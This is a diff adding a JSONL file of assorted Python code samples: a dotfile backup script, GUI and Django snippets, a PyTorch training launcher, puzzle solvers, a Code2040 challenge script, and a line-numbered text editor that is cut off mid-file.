diff --git "a/2389.jsonl" "b/2389.jsonl" new file mode 100644--- /dev/null +++ "b/2389.jsonl" @@ -0,0 +1,632 @@ +{"seq_id":"148678497","text":"#!/usr/bin/env python\n\nimport os\nimport sys\nimport logging\nimport argparse\nimport shutil\n\nfrom subprocess import call\n\n\ndef backup_atom(base_path, home):\n logger.info(\"Attempting to back up Atom settings...\")\n path = home + \"/.atom\"\n # do we even have an atom installation to back up?\n if os.path.isdir(path):\n # verify that the destination directory exists\n if not os.path.isdir(os.path.join(base_path + \"/atom\")):\n os.mkdir(os.path.join(base_path + \"/atom\"))\n\n files = []\n files_to_copy = []\n for (dirpath, dirnames, filenames) in os.walk(path):\n files.extend(filenames)\n # just want the first level\n break\n\n filetype = [\".json\", \".cson\", \".coffee\", \".less\"]\n for item in files:\n filename, file_extension = os.path.splitext(item)\n if file_extension in filetype:\n files_to_copy.append(item)\n\n for item in files_to_copy:\n logger.debug(\"Copying {}...\".format(item))\n logger.debug(os.path.join(base_path, \"atom\"))\n shutil.copyfile(os.path.join(path + \"/\" + item),\n os.path.join(base_path + \"/atom/\" + item))\n\n os.chdir(os.path.join(base_path + \"/atom\"))\n # call gets annoyed if we don't create the file first\n open(os.path.join(base_path + \"/atom/packages.list\"), 'w').close\n call(\"apm list --installed --bare > {}/atom/packages.list\".\n format(base_path), shell=True)\n\n logger.info(\"Successfully backed up Atom settings!\")\n\n else:\n logger.info(\"Unable to locate ~/.atom, skipping\")\n\n\ndef backup_bashrc(base_path, home):\n logger.debug(\"Attempting to back up .bashrc...\")\n shutil.copyfile(os.path.join(home + \"/.bashrc\"),\n os.path.join(base_path + \"/\" + \"bashrc\"))\n logger.info(\"Successfully backed up .bashrc!\")\n\n\ndef backup_gitconfig(base_path, home):\n logger.debug(\"Attempting to back up .gitconfig...\")\n shutil.copyfile(os.path.join(home + \"/.gitconfig\"),\n os.path.join(base_path + \"/\" + \"gitconfig\"))\n logger.info(\"Successfully backed up .gitconfig!\")\n\n\ndef backup(base_path, home):\n backup_atom(base_path, home)\n backup_bashrc(base_path, home)\n backup_gitconfig(base_path, home)\n\n\ndef restore(base_path, home):\n # for atom\n # apm install --packages-file packages.list\n pass\n\n\ndef main(argv):\n base_path = os.path.dirname(os.path.realpath(__file__))\n home = os.path.expanduser(\"~\")\n logger.debug(\"Currently running at: {}\".format(base_path))\n\n parser = argparse.ArgumentParser(\n description='Backup and restore Linux dotfiles.')\n parser.add_argument('-b', '-backup',\n help=\"Backup dotfiles from current system.\",\n action=\"store_true\")\n parser.add_argument('-r', '-restore',\n help=\"Restore dotfiles from the working directory.\",\n action=\"store_true\")\n\n args = parser.parse_args()\n if args.b == args.r:\n logger.error(\"You need to select only one of the options.\")\n sys.exit(1)\n\n if args.b is True:\n backup(base_path, home)\n elif args.r is True:\n restore(base_path, home)\n\n\nif __name__ == '__main__':\n\n logger = logging.getLogger('dotfile_manager')\n logger.setLevel(logging.DEBUG)\n ch = logging.StreamHandler()\n formatter = logging.Formatter(\n '%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n ch.setFormatter(formatter)\n logger.addHandler(ch)\n\n 
main(sys.argv)\n","sub_path":"dotfile_manager.py","file_name":"dotfile_manager.py","file_ext":"py","file_size_in_byte":3591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"190861944","text":"import tkinter as tk\nfrom tkinter import messagebox\n\n\nclass HelloWorldApp(tk.Frame):\n # 初期化\n def __init__(self, master=None):\n tk.Frame.__init__(self, master, width=240, height=240)\n\n self.master.title('Hello World')\n \n self.label = tk.Label(self, text='Hello World')\n self.label.place(x=20, y=100, width=200, height=40) \n\n \n # ラベル1の生成\n label1 = tk.Label(self, text='ラベル1◎◎◎◎', bg='LightSkyBlue')\n label1.place(x=10, y=10)\n \n # ラベル2の生成\n label2 = tk.Label(self, text='ラベル2◎◎', bg='LightSkyBlue')\n label2.place(x=120, y=10)\n \n # ラベル3の生成\n label3 = tk.Label(self, text='ラベル3◎◎◎', bg='LightSkyBlue')\n label3.place(x=10, y=50) \n \n # ボタンの生成\n self.button = tk.Button(self, text='OK', command=self.on_click) \n self.button.place(x=20, y=200, width=200, height=40)\n \n # クリック時に呼ば���る\n def on_click(self):\n messagebox.showinfo('情報', 'ボタンをクリックしました') \n\n\nif __name__ == '__main__':\n app= HelloWorldApp()\n app.pack()\n app.mainloop()","sub_path":"python/tkinter/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"220299122","text":"from django.db import models, migrations\nfrom django.conf import settings\n\nfrom social_core.utils import setting_name\n\nfrom ..storage import DjangoCodeMixin\n\nUSER_MODEL = getattr(settings, setting_name('USER_MODEL'), None) or \\\n getattr(settings, 'AUTH_USER_MODEL', None) or \\\n 'auth.User'\n\n\nclass Migration(migrations.Migration):\n replaces = [\n ('default', '0002_add_related_name'),\n ('social_auth', '0002_add_related_name')\n ]\n\n dependencies = [\n ('social_django', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Code',\n fields=[\n ('id', models.AutoField(\n verbose_name='ID', serialize=False, auto_created=True,\n primary_key=True)),\n ('email', models.EmailField(max_length=75)),\n ('code', models.CharField(max_length=32, db_index=True)),\n ('verified', models.BooleanField(default=False)),\n ],\n options={\n 'db_table': 'social_auth_code',\n },\n bases=(models.Model, DjangoCodeMixin),\n ),\n migrations.AlterField(\n model_name='usersocialauth',\n name='user',\n field=models.ForeignKey(\n related_name='social_auth', to=USER_MODEL, on_delete=models.CASCADE,\n )\n ),\n migrations.AlterUniqueTogether(\n name='code',\n unique_together={('email', 'code')},\n ),\n ]\n","sub_path":"social_django/migrations/0002_add_related_name.py","file_name":"0002_add_related_name.py","file_ext":"py","file_size_in_byte":1536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"261053431","text":"import re\nx = []\nfor line in open('logfile.log'):\n t = int(line)\n x.append(t)\n\nlinenum = -1\ni = 0\nn = -1\nh = []\nfor line in open('conv_2_test_rom.coe'):\n linenum += 1\n if linenum < 2:\n continue\n if i % 16 == 0:\n h.append([])\n n = n + 1\n if linenum < 64:\n print(line,end='')\n t = int(re.split(',|;',line)[0],base=16)\n t -= (0 if t < 0x7F else 0x100)\n h[n].append(t)\n i = i + 1\n\ndef dot(x,y):\n return sum([x[i]*y[i] for i in range(len(x))])\n\nn = 0\ni = 0\niternum = 0\nps = [0]*45\nwhile n < 4:\n xx = x[i:i+16]\n y = dot(xx,h[n])\n psi = iternum % 45\n ps[psi] += y\n res = ps[psi]\n print('iternum: {0}, n: 
{3}, i: {2}, y: {1}, ps[{5}]: {4}'.format(iternum,y,i,n,res,psi))\n    i = i + 1\n    iternum += 1\n    if iternum % 45 == 0:\n        i = i + 15\n        n = n + 1\n\nprint(ps)\n","sub_path":"vhdl/helpers/conv_2/whole.py","file_name":"whole.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"418177556","text":"#encoding: UTF-8\n\n# Author: Nazdira Abigail Cerda deL Prado, A01375428\n# Description: Converts Cartesian coordinates to polar coordinates and computes the magnitude of \"r\", asking the user for the values of \"x\" and \"y\"\n\n# Write your program from here on\n\nx1=int(input(\"Insertar valor de x:\"))\ny1=int(input(\"Insertar valor de y:\"))\n\nimport math\nangulo= math.atan2(y1,x1)\nmagnitud=((x1**2)+(y1**2))**0.5\nanguloc=(angulo*180)/3.1416\n\nprint(\"Magnitud:\")\nprint(magnitud)\nprint(\"Angulo:\")\nprint(anguloc)","sub_path":"coordenadas.py","file_name":"coordenadas.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"60101793","text":"import os\r\nimport time\r\nimport torch\r\nimport torch.optim as optim\r\nfrom torch.utils.data import DataLoader\r\nfrom torch.optim.lr_scheduler import ReduceLROnPlateau\r\nfrom net_model import NetworkModel\r\nfrom net_work import Network\r\nfrom net_utils import NetUtils\r\nfrom tensorboardX import SummaryWriter\r\nfrom dataset_generator import DatasetGenerator\r\n\r\nclass LaunchNetwork:\r\n\r\n    def __init__(self, args):\r\n\r\n        print('Preparing network...')\r\n        os.environ['CUDA_VISIBLE_DEVICES'] = '0'\r\n        self.launcher(args)\r\n\r\n\r\n    def launcher(self, args):\r\n\r\n        logs = self.set_logs(args)\r\n\r\n        # ---- Get transformations\r\n\r\n        netUtils = NetUtils()\r\n\r\n        transform_train = netUtils.get_transformations(netUtils.TRANS_TYPE_TRAIN)\r\n        transform_val = netUtils.get_transformations(netUtils.TRANS_TYPE_VAL)\r\n        transform_test = netUtils.get_transformations(netUtils.TRANS_TYPE_TEST)\r\n\r\n        # ---- Generate datasets and dataloaders\r\n\r\n        img_db = args.get('path_db')\r\n        batch_size = args.get('batch_size')\r\n\r\n        dataset_train = DatasetGenerator(pathImageDirectory=img_db, pathDatasetFile=args.get('path_train'), transform=transform_train)\r\n        dataset_val = DatasetGenerator(pathImageDirectory=img_db, pathDatasetFile=args.get('path_val'), transform=transform_val)\r\n        dataset_test = DatasetGenerator(pathImageDirectory=img_db, pathDatasetFile=args.get('path_test'), transform=transform_test)\r\n\r\n        dataloader_train = DataLoader(dataset=dataset_train, batch_size=batch_size, \\\r\n                                      shuffle=True, num_workers=0, pin_memory=False)\r\n        dataloader_val = DataLoader(dataset=dataset_val, batch_size=batch_size, \\\r\n                                    shuffle=True, num_workers=0, pin_memory=False)\r\n        dataloader_test = DataLoader(dataset=dataset_test, batch_size=batch_size,\r\n                                     shuffle=False, num_workers=0, pin_memory=False)\r\n\r\n        # ---- CIFAR10 data loader (commented-out debug path)\r\n\r\n        # transform_cifar = netUtils.get_transformations(netUtils.TRANS_TYPE_MNIST)\r\n\r\n        # trainset = torchvision.datasets.CIFAR10('./tmp', train=True, download=True, transform=transform_cifar)\r\n        # dataloader_train = torch.utils.data.DataLoader(trainset, batch_size=batch_size, shuffle=True, num_workers=0)\r\n\r\n        # valset = torchvision.datasets.CIFAR10('./tmp', train=False, download=True, transform=transform_cifar)\r\n        # dataloader_val = torch.utils.data.DataLoader(valset, batch_size=batch_size, shuffle=True, num_workers=0)\r\n\r\n        # testset = 
torchvision.datasets.CIFAR10('./tmp', train=False, download=True, transform=transform_cifar)\r\n # dataloader_test = torch.utils.data.DataLoader(testset, batch_size=batch_size, shuffle=False, num_workers=0)\r\n\r\n class_dist_train = dataset_train.getClassDistribution()\r\n\r\n # ---- Model\r\n networkModel = NetworkModel()\r\n model = networkModel.get_network_model(args.get('net_model'),\r\n args.get('class_num'),\r\n args.get('net_is_trained'),\r\n args.get('net_activation'))\r\n model = torch.nn.DataParallel(model).cuda()\r\n\r\n # ---- Save model chart\r\n writer = SummaryWriter(args.get('path_summary'), comment=args.get('net_model'))\r\n for i, (input, target) in enumerate(dataloader_train):\r\n writer.add_graph(model, (input,))\r\n break\r\n\r\n # ---- Optimizer and scheduler\r\n\r\n optimizer = optim.Adam(model.parameters(), lr=0.0001, betas=(0.9, 0.999), \\\r\n eps=1e-08, weight_decay=1e-5)\r\n scheduler = ReduceLROnPlateau(optimizer, factor=0.1, patience=5, mode='min')\r\n\r\n # ---- Set loss\r\n loss_fx = netUtils.get_loss(args.get('net_loss'), weights=class_dist_train)\r\n\r\n # -------------TRAINING-------------\r\n network = Network()\r\n # network.train(dataloader_train, dataloader_val, model,\r\n # args.get('net_epoch'), loss_fx,\r\n # optimizer, scheduler, logs.get('path_model'),\r\n # logs.get('path_log'), args.get('path_summary'))\r\n\r\n # ---- Get the best model\r\n model_check = torch.load(os.path.join(args.get('path_model'), 'm-21122018-065015.pth.tar'))\r\n model.load_state_dict(model_check['state_dict'])\r\n\r\n # ---- Launch testing\r\n loss_val, acc, auroc, f1, mcc, spec, sen = network.test(dataloader_test, model, loss_fx, args.get('class_num'),\r\n logs.get('path_acc'), logs.get('path_pred'),\r\n args.get('path_summary'))\r\n file_log = open(logs.get('path_test'), 'w')\r\n file_log.write(\"loss: \" + str(loss_val.item()) + \" acc: \" + str(acc)\r\n + \" auroc: \" + str(auroc) + \" f1: \" + str(f1) + \" mcc: \" + str(mcc)\r\n + \" specificity: \" + str(spec) + \" sensitivity: \" + str(sen))\r\n file_log.flush()\r\n file_log.close()\r\n\r\n def set_logs(self, args):\r\n timestamp_time = time.strftime(\"%H%M%S\")\r\n timestamp_date = time.strftime(\"%d%m%Y\")\r\n timestamp_start = timestamp_date + '-' + timestamp_time\r\n\r\n name_model = 'm-' + timestamp_start + '.pth.tar'\r\n name_log = 'log-' + timestamp_start + '.txt'\r\n name_test = 'test-' + timestamp_start + '.txt'\r\n name_acc = 'acc-' + timestamp_start + '.txt'\r\n name_pred = 'pred-' + timestamp_start + '.txt'\r\n\r\n path_model = os.path.join(args.get('path_model'), name_model)\r\n path_log = os.path.join(args.get('path_log'), name_log)\r\n path_test = os.path.join(args.get('path_log'), name_test)\r\n path_acc = os.path.join(args.get('path_acc'), name_acc)\r\n path_pred = os.path.join(args.get('path_pred'), name_pred)\r\n\r\n file_log = open(path_log, 'w')\r\n file_log.write('DATABASE: ' + args.get('path_db'))\r\n file_log.write('\\nFILE-TRAIN: ' + args.get('path_train'))\r\n file_log.write('\\nFILE-VAL: ' + args.get('path_val'))\r\n file_log.write('\\nFILE-TEST: ' + args.get('path_test'))\r\n file_log.write('\\nOUT-MODEL: ' +path_model)\r\n file_log.write('\\nOUT-LOG: ' + path_log)\r\n file_log.write('\\nOUT-ACC: ' + path_acc)\r\n file_log.write('\\nOUT-PRED: ' + path_pred)\r\n file_log.write('\\nOUT-SUMMARY: ' + args.get('path_summary'))\r\n file_log.write('\\nNETWORK: ' + args.get('net_model'))\r\n file_log.write('\\nDIMENSION: ' + str(args.get('class_num')))\r\n file_log.write('\\nIS-TRAINED: ' + 
str(args.get('net_is_trained')))\r\n        file_log.write('\\nLOSS: ' + args.get('net_loss'))\r\n        file_log.write('\\nACTIVATION: ' + args.get('net_activation'))\r\n        file_log.write('\\nTRANS-RESIZE: ' + str(args.get('trans_resize')))\r\n        file_log.write('\\nTRANS-CROP: ' + str(args.get('trans_crop')))\r\n        file_log.write('\\nBATCH: ' + str(args.get('batch_size')))\r\n        file_log.write('\\nEPOCHS: ' + str(args.get('net_epoch')))\r\n        file_log.write('\\n\\n')\r\n        file_log.flush()\r\n        file_log.close()\r\n\r\n        return {\r\n            'path_model': path_model,\r\n            'path_log' : path_log,\r\n            'path_acc' : path_acc,\r\n            'path_pred' : path_pred,\r\n            'path_test' : path_test\r\n        }\r\n","sub_path":"launch_network.py","file_name":"launch_network.py","file_ext":"py","file_size_in_byte":7460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"154444086","text":"import gender_guesser.detector as gender\r\nimport pandas as pd\r\n\r\nd = gender.Detector()\r\ndef no_mostly(name):\r\n    try:\r\n        if name == \"FIRST NAME\":\r\n            raise Exception\r\n        res = d.get_gender(name.title())\r\n        if \"mostly\" in res:\r\n            res = res[7:]\r\n        elif res == \"andy\":\r\n            res = \"unknown\"\r\n        return res\r\n    except:\r\n        return \"error\"\r\n\r\ndf = pd.read_csv(\"salaries.csv\")\r\ndf[\"Gender\"] = df[\"0\"].apply(no_mostly)\r\n\r\ndf.to_csv(\"virginia_salaries.csv\")\r\n","sub_path":"determine_gender.py","file_name":"determine_gender.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"40293368","text":"# Helper class that takes a non-batched dataset reader and makes it batched, by merging multiple items via a merging\n# function that is provided by the user.\nfrom __future__ import annotations\nfrom overrides import overrides\nfrom abc import abstractmethod\nfrom collections.abc import Iterable\nfrom typing import Tuple, List\nfrom ..batched_dataset_reader import BatchedDatasetReader\nfrom ..compound_dataset_reader import CompoundDatasetReader, CompoundDatasetEpochIterator\nfrom ..dataset_reader import DatasetReader\nfrom ..dataset_types import *\n\nclass MergeBatchedDatasetEpochIterator(CompoundDatasetEpochIterator):\n\t@overrides\n\tdef __getitem__(self, ix):\n\t\tindex = self.indexFn(ix)\n\t\tif isinstance(index, slice):\n\t\t\tindex = np.arange(index.start, index.stop)\n\t\tif isinstance(index, (int, np.integer)):\n\t\t\tindex = [index]\n\t\tassert isinstance(index, Iterable), \"Got type: %s\" % type(index)\n\n\t\tlistItems = [self.baseIterator[j] for j in index]\n\t\tassert len(listItems) == self.batchLens[ix]\n\t\titems = self.reader.mergeFn(listItems)\n\t\treturn items, len(listItems)\n\nclass MergeBatchedDatasetReader(CompoundDatasetReader):\n\tdef __init__(self, baseReader:DatasetReader, mergeFn:Callable[[List[DatasetItem]], DatasetItem], batchesFn=None):\n\t\ttry:\n\t\t\tbatches = baseReader.getBatches()\n\t\t\talreadyBatched = True\n\t\texcept Exception as e:\n\t\t\talreadyBatched = False\n\t\tassert not alreadyBatched, \"[MergeBatchDatasetReader] Already a batched dataset, sir!\"\n\t\tsuper().__init__(baseReader)\n\n\t\tif batchesFn is None:\n\t\t\tdef f():\n\t\t\t\tassert False, \"Must be provided or overridden somewhere\"\n\t\t\tbatchesFn = f\n\n\t\tself.mergeFn = mergeFn\n\t\tself.batchesFn = batchesFn\n\n\tdef getBatches(self):\n\t\treturn self.batchesFn()\n\n\tdef iterateOneEpoch(self):\n\t\treturn MergeBatchedDatasetEpochIterator(self)\n\n\tdef __len__(self):\n\t\tret = 
super().__len__()\n\t\treturn ret\n\n\tdef __str__(self) -> str:\n\t\tsummaryStr = \"[MergeBatchedDatasetReader]\"\n\t\tsummaryStr += \"\\n %s\" % str(self.baseReader)\n\t\treturn summaryStr\n\n","sub_path":"neural_wrappers/readers/batched_dataset_reader/merge_batched_dataset_reader.py","file_name":"merge_batched_dataset_reader.py","file_ext":"py","file_size_in_byte":1971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"384336376","text":"import requests, json, datetime\n\n# Send initial request to get response with keys 'interval' and 'datestamp'\nurl = \"http://challenge.code2040.org/api/dating\"\nr = requests.post(url, json = {'token' : 'f0b70d2efbd8fe9e76312ac0d1a68c16'})\ndata = json.loads(r.text)\n\n# Store values from the dictionary into the dateGiven and interval variables\ndateGiven = data[\"datestamp\"]\ninterval = data[\"interval\"]\n\n# These values will be used to create a datetime object.\n# Once we have the datetime object, we can use timedelta to add interval to our date\nyear = dateGiven[:4]\nmonth = dateGiven[5:7]\nday = dateGiven[8:10]\nhour = dateGiven[11:13]\nminute = dateGiven[14:16]\nsecond = dateGiven[17:19]\n\n# datetime object from the values of the ISO 8601 format we were given\nisoToDatetime = datetime.datetime(int(year), int(month), int(day), int(hour), int(minute), int(second))\n\n# Add the interval to a the variable we will return, called datestamp\ninterval = datetime.timedelta(seconds=interval)\ndatestamp = isoToDatetime + interval\ndatestamp = datestamp.isoformat()\n\n# Append \"Z\" to the end of the datestamp because the isoformat()\n# function did not identically convert to the format we were given\ndatestamp += \"Z\"\n\n# Send final request with token and the new date in identical format to what we were given\nurl = \"http://challenge.code2040.org/api/dating/validate\"\nr = requests.post(url, json = {'token': 'f0b70d2efbd8fe9e76312ac0d1a68c16', 'datestamp' : datestamp})","sub_path":"step5.py","file_name":"step5.py","file_ext":"py","file_size_in_byte":1450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"491470876","text":"import unittest\nimport os\nfrom pathlib import Path\nimport itertools\n\nfrom StateSpaceSearch import (StateSpaceSearch, Maze, MazeLayout, SearchState, Movement, Move)\n\nclass JumpingLabyrinth( StateSpaceSearch, Maze ):\n\tdef __init__( self, mazeLayout, constraintList, mazeName=None ):\n\t\tMaze.__init__( self, mazeLayout, mazeName )\n\t\t\n\t\tself.allowedMovementCodes = Movement.horizontalOrVerticalMovementCode\n\t\tself.emptyCellToken, self.blockedCellToken, self.startCellToken, self.targetCellToken = '.', '#', 'S', 'T'\n\t\tself.blockedCells = set()\n\n\t\trows, cols = self.getDimensions()\n\t\tfor row, col in itertools.product( range( rows ), range( cols ) ):\n\t\t\ttoken = self.mazeLayout.getRaw( row, col )\n\t\t\tif token == self.startCellToken:\n\t\t\t\tself.startCell = (row, col)\n\t\t\telif token == self.targetCellToken:\n\t\t\t\tself.targetCell = (row, col)\n\t\t\telif token == self.blockedCellToken:\n\t\t\t\tself.blockedCells.add( (row, col) )\n\t\t\telse:\n\t\t\t\tassert token == self.emptyCellToken\n\n\t\t# For a given jump length, we store the next allowed jump length in self.distanceDict.\n\t\tself.distanceDict = dict()\n\t\tfor i in range( len( constraintList ) ):\n\t\t\tself.distanceDict[ constraintList[ i ] ] = constraintList[ ( i + 1 ) % len( constraintList ) ]\n\t\t# Initial jump length is stored in 
self.distanceDict[ None ].\n\t\tself.distanceDict[ None ] = constraintList[ 0 ]\n\n\tdef getAdjacentStateList( self, currentState ):\n\t\tadjacentStateList = list()\n\n\t\tdistance = self.distanceDict[ None ] if currentState.previousMove is None else \\\n\t\t self.distanceDict[ currentState.previousMove.moveDistance ]\n\n\t\trow, col = currentState.cell\n\t\tfor directionTag, (du, dv) in self.allowedMovementCodes.items():\n\t\t\t# We have to move 'distance' units in the given direction. Each cell in our direction of\n\t\t\t# movement should be unblocked and inside the maze.\n\t\t\tfor delta in range( 1, distance + 1 ):\n\t\t\t\tnewCell = u, v = row + du * delta, col + dv * delta\n\t\t\t\tif self.isCellOutsideGrid( newCell ) or newCell in self.blockedCells:\n\t\t\t\t\tnewCell = None\n\t\t\t\t\tbreak\n\t\t\tif newCell is not None:\n\t\t\t\tmove = Move( moveCode=directionTag, moveDistance=distance )\n\t\t\t\tnewSearchState = SearchState( newCell, previousMove=move, previousState=currentState )\n\t\t\t\tadjacentStateList.append( newSearchState )\n\t\t\n\t\treturn adjacentStateList\n\n\tdef getCacheEntryFromSearchState( self, searchState ):\n\t\treturn (searchState.cell, None if searchState.previousMove is None else searchState.previousMove.moveDistance)\n\n\tdef getStartState( self ):\n\t\treturn SearchState( self.startCell, previousMove=None, previousState=None )\n\n\tdef isTargetState( self, currentState ):\n\t\treturn currentState.isTargetState( self.targetCell )\n\n\tdef solve( self ):\n\t\tsearchState = self.breadthFirstSearch()\n\t\tpathString, _ = self.getPath( searchState )\n\n\t\treturn pathString\n\nclass JumpingLabyrinthTest( unittest.TestCase ):\n\tdef _readMaze( self, filename ):\n\t\tdataChunkList = list()\n\t\twith open( 'tests/JumpingLabyrinth/{}'.format( filename ) ) as inputFile:\n\t\t\tfor inputLine in inputFile.readlines():\n\t\t\t\tdataChunkList.append( inputLine.strip() )\n\t\tmazeLayout = dataChunkList[ : -1 ]\n\t\tconstraintList = list( map( int, dataChunkList[ -1 ].split( ',' ) ) )\n\t\treturn mazeLayout, constraintList\n\n\tdef _render( self, mazeLayout, mazeName, pathString, pathLength ):\n\t\tprint( 'JumpingLabyrinth: mazeName = {}'.format( mazeName ) )\n\t\tfor mazeRow in mazeLayout:\n\t\t\tprint( mazeRow )\n\t\tprettyPathString = ''.join( map( lambda token : token.strip(), pathString.split( ':' ) ) )\n\t\tprint( 'Path : {} Length = {}'.format( prettyPathString, pathLength ) )\n\t\tprint()\n\n\tdef _verify( self, testcaseFile, expectedSolutionDict ):\n\t\tmazeLayout, constraintList = self._readMaze( testcaseFile )\n\t\tmazeName = testcaseFile\n\t\tjumpingLabyrinth = JumpingLabyrinth( MazeLayout( mazeLayout ), constraintList, mazeName=mazeName )\n\t\tpathString = jumpingLabyrinth.solve()\n\n\t\tpathLength = len( pathString.split( ':' ) )\n\t\tself._render( mazeLayout, mazeName, pathString, pathLength )\n\n\t\tself.assertEqual( pathLength, expectedSolutionDict[ testcaseFile ] )\n\n\tdef _readSolutionFile( self, solutionFileName ):\n\t\texpectedSolutionDict = dict()\n\t\twith open( 'tests/JumpingLabyrinth/{}.ans'.format( solutionFileName ) ) as solutionFile:\n\t\t\tfor solutionLine in solutionFile.readlines():\n\t\t\t\ttestcaseFile, expectedMoveCount = solutionLine.strip().split( ':' )\n\t\t\t\texpectedSolutionDict[ testcaseFile.strip() ] = int( expectedMoveCount )\n\t\treturn expectedSolutionDict\n\n\tdef test_solve( self ):\n\t\ttestcaseFiles = set()\n\t\tfor testcaseFile in os.listdir( 'tests/JumpingLabyrinth' ):\n\t\t\ttestcaseFiles.add( Path( testcaseFile ).stem 
)\n\n\t\tsolutionFileName = 'Solution'\n\t\ttestcaseFiles.remove( solutionFileName )\n\t\texpectedSolutionDict = self._readSolutionFile( solutionFileName )\n\t\t\n\t\tfor testcaseFile in testcaseFiles:\n\t\t\tself._verify( testcaseFile, expectedSolutionDict )\n\nif __name__ == '__main__':\n\tunittest.main()","sub_path":"MazeMania/LogicMaze/JumpingLabyrinth.py","file_name":"JumpingLabyrinth.py","file_ext":"py","file_size_in_byte":4876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"28943642","text":"nums = list(map(int, input(\"입력: \").rstrip().split(',')))\nmax_num = nums[0]\nfor num in nums:\n    max_num = num if num > max_num else max_num \nprint(max_num)\n\n# You could just use max(nums) instead. (max(): returns the largest of the elements) \n\n\"\"\"\nCode that returns the largest value among the elements of a list.\nRather than writing it like this, make use of Python built-ins such as max() and min().\n\"\"\"\n","sub_path":"_2 파이썬 문법정리 파일(구버전)/3/06-(요소중최댓값).py","file_name":"06-(요소중최댓값).py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"255986532","text":"import random, linecache,re, os, time\nfrom draw import draw\n\n# Initialize necessary variables for this game\ntrial = []\nerrorNumber = 0\n\n# Restart the program after the game finishes\ndef restartGame():\n    time.sleep(5)\n    os.system(\"python main.py\")\n    exit()\n\n# Clear the screen to make it easier to read\ndef clearScreen():\n    os.system('clear')\n\n# Re-format the list to look more like a hangman game\ndef formatList(name):\n    print(' '.join(name))\n\n# Show the current status of the game, including the number of trials and the number of errors\ndef currentStatus():\n    print(\"Current Status of Game\\n\")\n    formatList(test)\n    print(\"\\nYour previous guess is following: \"+', '.join(trial))\n\n# Check if the user's input is in the answer. If so, update the test status; if not, update the error number\ndef checkInput(input):\n    global errorNumber\n    outcome = [i for i, x in enumerate(answer) if x==input.upper()]\n    if len(outcome) > 0:\n        for x in range(0, len(outcome)):\n            test[outcome[x]] = input.upper()\n    else:\n        errorNumber += 1\n        draw(errorNumber)\n\n# Retrieve the word randomly from the words.txt file\nword = linecache.getline('words.txt', random.randint(1, 81)).rstrip('\\n')\n\n# Make the word into a list for further usage\nanswer = list(word.upper())\n\n# Duplicate another list that can be compared with the answer and shown on the screen\ntest = answer.copy()\nfor x in range(0, len(test)):\n    test[x] = \"_\"\n\nclearScreen()\n\n# The game starts here\nprint(\"Welcome to Hangman Game! Let's test your vocabulary!\\n\")\nprint(\"Hint: This is a %s-letter word.\\n\" %len(test))\nformatList(test)\n\n# The game will keep running until the user gets the final answer or makes 8 errors\n# The user can only input letters from a to z, and only 1 letter at a time\n# Otherwise, they will be notified with an error message\nwhile errorNumber < 8 and test!=answer:\n    userInput = input(\"\\nPlease guess the letter in this word: \")\n    if re.match(\"^[a-z]*$\", userInput) and len(userInput) == 1:\n        if userInput.upper() not in trial:\n            trial.append(userInput.upper())\n            checkInput(userInput)\n            clearScreen()\n            currentStatus()\n        else:\n            print(\"\\nYou already try %s before\" % userInput.upper())\n            continue\n    else:\n        print(\"\\nPlease input only 1 letter and from a to z\")\n        continue\n\n# Test if the user won or lost the game\nif test!=answer:\n    print(\"Sorry, you lose. But I believe you can make it next time!\")\nelse:\n    print(\"\\nYes,you win. 
You are the Wordsmith!\")\n\nrestartGame()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"365254535","text":"# --- Das Textfeld mit den Zeilennummern stammt von eyllanesc mit leichten Veränderungen von mir. --- #\n# --- https://stackoverflow.com/questions/50074155/how-to-add-line-number-in-this-texteditor --- #\n# --- MIT-Lizenz (frei Benutzung) --- #\n\n\nfrom PyQt5.QtWidgets import QWidget, QPlainTextEdit, QTextEdit\nfrom PyQt5.QtGui import QColor, QTextFormat, QPainter, QFont\nfrom PyQt5.QtCore import QRect, pyqtSlot, Qt, QSize\n\n\nclass LineNumberArea(QWidget):\n def __init__(self, editor):\n QWidget.__init__(self, parent=editor)\n self.codeEditor = editor\n\n def sizeHint(self):\n return QSize(self.codeEditor.line_number_area_width(), 0)\n\n def paintEvent(self, event):\n self.codeEditor.line_number_area_paint_event(event)\n\n\nclass CodeEditor(QPlainTextEdit):\n def __init__(self, parent=None):\n QPlainTextEdit.__init__(self, parent)\n f = QFont(\"Consolas\", 14)\n f.setBold(True)\n self.setFont(f)\n self.lineNumberArea = LineNumberArea(self)\n self.blockCountChanged.connect(self.updateline_number_area_width)\n self.updateRequest.connect(self.update_line_number_area)\n self.cursorPositionChanged.connect(self.highlight_current_line)\n self.updateline_number_area_width(0)\n self.highlight_current_line()\n\n def line_number_area_paint_event(self, event):\n painter = QPainter(self.lineNumberArea)\n painter.fillRect(event.rect(), Qt.lightGray)\n\n block = self.firstVisibleBlock()\n block_number = block.blockNumber()\n top = self.blockBoundingGeometry(block).translated(self.contentOffset()).top()\n bottom = top + self.blockBoundingRect(block).height()\n while block.isValid() and top <= event.rect().bottom():\n if block.isVisible() and bottom >= event.rect().top():\n number = str(block_number + 1)\n 